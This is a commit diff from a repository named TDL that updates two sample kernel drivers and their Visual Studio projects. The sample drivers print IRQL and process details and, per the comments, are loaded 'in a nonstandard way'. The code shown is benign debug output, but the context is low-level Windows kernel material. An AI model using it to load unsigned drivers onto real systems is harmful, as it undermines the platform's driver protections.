nopriest
/
TDL
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

v 1.1.1 

Update for Windows 10rs2 (15063)
This commit is contained in:
hfiref0x 2017-04-20 16:52:12 +07:00
parent 7e4aec975f
commit 9db2618d9e
16 changed files with 379 additions and 492 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Furutaka.exe
View File

Binary file not shown.

BIN
Compiled/dummy.sys
View File

Binary file not shown.

BIN
Compiled/dummy2.sys
View File

Binary file not shown.

2
Source/DummyDrv/dummy.sln
View File

@ -1,7 +1,7 @@
 
Microsoft Visual Studio Solution File, Format Version 12.00 Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14 # Visual Studio 14
VisualStudioVersion = 14.0.24720.0 VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1 MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject EndProject

138
Source/DummyDrv/dummy/dummy.vcxproj
View File

@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64"> <ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration> <Configuration>Debug</Configuration>
<Platform>x64</Platform> <Platform>x64</Platform>
@ -17,22 +9,6 @@
<Configuration>Release</Configuration> <Configuration>Release</Configuration>
<Platform>x64</Platform> <Platform>x64</Platform>
</ProjectConfiguration> </ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup> </ItemGroup>
<PropertyGroup Label="Globals"> <PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid> <ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
@ -45,22 +21,6 @@
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion> <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion> <TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
@ -78,38 +38,6 @@
<DriverTargetPlatform>Universal</DriverTargetPlatform> <DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings"> <ImportGroup Label="ExtensionSettings">
</ImportGroup> </ImportGroup>
@ -118,18 +46,6 @@
</ImportGroup> </ImportGroup>
<PropertyGroup Label="UserMacros" /> <PropertyGroup Label="UserMacros" />
<PropertyGroup /> <PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor> <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
@ -143,30 +59,6 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir> <OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir> <IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner> <SuppressStartupBanner>false</SuppressStartupBanner>
@ -192,36 +84,6 @@
<Profile>false</Profile> <Profile>false</Profile>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile> <ClCompile>
<TreatWarningAsError>false</TreatWarningAsError> <TreatWarningAsError>false</TreatWarningAsError>

56
Source/DummyDrv/dummy/main.c
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 * (C) COPYRIGHT AUTHORS, 2016 - 2017
* *
* TITLE: MAIN.C * TITLE: MAIN.C
* *
* VERSION: 1.00 * VERSION: 1.01
* *
* DATE: 29 Jan 2016 * DATE: 20 Apr 2017
* *
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -31,33 +31,55 @@ DRIVER_INITIALIZE DriverEntry;
NTSTATUS DriverEntry( NTSTATUS DriverEntry(
_In_ struct _DRIVER_OBJECT *DriverObject, _In_ struct _DRIVER_OBJECT *DriverObject,
_In_ PUNICODE_STRING RegistryPath _In_ PUNICODE_STRING RegistryPath
) )
{ {
LARGE_INTEGER tm;
PEPROCESS Process; PEPROCESS Process;
KIRQL Irql;
tm.QuadPart = -10000000; PWSTR sIrql;
/* This parameters are invalid due to nonstandard way of loading and should not be used. */ /* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath); UNREFERENCED_PARAMETER(RegistryPath);
DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry); DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p\n", MmSystemRangeStart, DriverEntry);
Process = PsGetCurrentProcess(); Process = PsGetCurrentProcess();
DbgPrint("I'm at %s, Process : %lu (%p)\n",
do {
KeDelayExecutionThread(KernelMode, FALSE, &tm);
DbgPrint("I'm at %s, Process : %lu (%p)",
__FUNCTION__, __FUNCTION__,
(ULONG)PsGetCurrentProcessId(), (ULONG)PsGetCurrentProcessId(),
Process Process);
);
Irql = KeGetCurrentIrql();
} while (1); switch (Irql) {
case PASSIVE_LEVEL:
sIrql = L"PASSIVE_LEVEL";
break;
case APC_LEVEL:
sIrql = L"APC_LEVEL";
break;
case DISPATCH_LEVEL:
sIrql = L"DISPATCH_LEVEL";
break;
case CMCI_LEVEL:
sIrql = L"CMCI_LEVEL";
break;
case CLOCK_LEVEL:
sIrql = L"CLOCK_LEVEL";
break;
case IPI_LEVEL:
sIrql = L"IPI_LEVEL";
break;
case HIGH_LEVEL:
sIrql = L"HIGH_LEVEL";
break;
default:
sIrql = L"Unknown Value";
break;
}
DbgPrint("KeGetCurrentIrql=%ws\n", sIrql);
return STATUS_SUCCESS; return STATUS_SUCCESS;
} }

2
Source/DummyDrv2/dummy.sln
View File

@ -1,7 +1,7 @@
 
Microsoft Visual Studio Solution File, Format Version 12.00 Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14 # Visual Studio 14
VisualStudioVersion = 14.0.24720.0 VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1 MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject EndProject

138
Source/DummyDrv2/dummy/dummy.vcxproj
View File

@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64"> <ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration> <Configuration>Debug</Configuration>
<Platform>x64</Platform> <Platform>x64</Platform>
@ -17,22 +9,6 @@
<Configuration>Release</Configuration> <Configuration>Release</Configuration>
<Platform>x64</Platform> <Platform>x64</Platform>
</ProjectConfiguration> </ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup> </ItemGroup>
<PropertyGroup Label="Globals"> <PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid> <ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
@ -45,22 +21,6 @@
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion> <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion> <TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
@ -78,38 +38,6 @@
<DriverTargetPlatform>Universal</DriverTargetPlatform> <DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings"> <ImportGroup Label="ExtensionSettings">
</ImportGroup> </ImportGroup>
@ -118,18 +46,6 @@
</ImportGroup> </ImportGroup>
<PropertyGroup Label="UserMacros" /> <PropertyGroup Label="UserMacros" />
<PropertyGroup /> <PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor> <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
@ -143,30 +59,6 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir> <OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir> <IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner> <SuppressStartupBanner>false</SuppressStartupBanner>
@ -192,36 +84,6 @@
<Profile>false</Profile> <Profile>false</Profile>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile> <ClCompile>
<TreatWarningAsError>false</TreatWarningAsError> <TreatWarningAsError>false</TreatWarningAsError>

109
Source/DummyDrv2/dummy/main.c
View File

@ -1,12 +1,14 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 * (C) COPYRIGHT AUTHORS, 2016 - 2017
* *
* TITLE: MAIN.C * TITLE: MAIN.C
* *
* VERSION: 1.00 * VERSION: 1.01
* *
* DATE: 29 Jan 2016 * DATE: 20 Apr 2017
*
* "Driverless" example #2
* *
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -19,6 +21,51 @@
#define DEBUGPRINT #define DEBUGPRINT
/*
* PrintIrql
*
* Purpose:
*
* Debug print current irql.
*
*/
VOID PrintIrql()
{
KIRQL Irql;
PWSTR sIrql;
Irql = KeGetCurrentIrql();
switch (Irql) {
case PASSIVE_LEVEL:
sIrql = L"PASSIVE_LEVEL";
break;
case APC_LEVEL:
sIrql = L"APC_LEVEL";
break;
case DISPATCH_LEVEL:
sIrql = L"DISPATCH_LEVEL";
break;
case CMCI_LEVEL:
sIrql = L"CMCI_LEVEL";
break;
case CLOCK_LEVEL:
sIrql = L"CLOCK_LEVEL";
break;
case IPI_LEVEL:
sIrql = L"IPI_LEVEL";
break;
case HIGH_LEVEL:
sIrql = L"HIGH_LEVEL";
break;
default:
sIrql = L"Unknown Value";
break;
}
DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql);
}
/* /*
* DevioctlDispatch * DevioctlDispatch
* *
@ -168,26 +215,6 @@ NTSTATUS CloseDispatch(
return Irp->IoStatus.Status; return Irp->IoStatus.Status;
} }
VOID ListModules(
_In_ struct _DRIVER_OBJECT *DriverObject
)
{
PLIST_ENTRY entry0, entry1;
KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection;
if (section == NULL)
return;
entry0 = section->InLoadOrderLinks.Flink;
entry1 = entry0;
do {
section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
DbgPrint("Section=%p, %wZ", section, section->BaseDllName);
entry1 = entry1->Flink;
} while (entry1 != entry0);
}
/* /*
* DriverInitialize * DriverInitialize
* *
@ -202,37 +229,33 @@ NTSTATUS DriverInitialize(
) )
{ {
NTSTATUS status; NTSTATUS status;
UNICODE_STRING SymLink, DevName/*, DrvRefName*/; UNICODE_STRING SymLink, DevName;
PDEVICE_OBJECT devobj; PDEVICE_OBJECT devobj;
ULONG t; ULONG t;
WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 };
WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 };
// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 };
// PDRIVER_OBJECT driverObject;
//RegistryPath is NULL //RegistryPath is NULL
UNREFERENCED_PARAMETER(RegistryPath); UNREFERENCED_PARAMETER(RegistryPath);
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
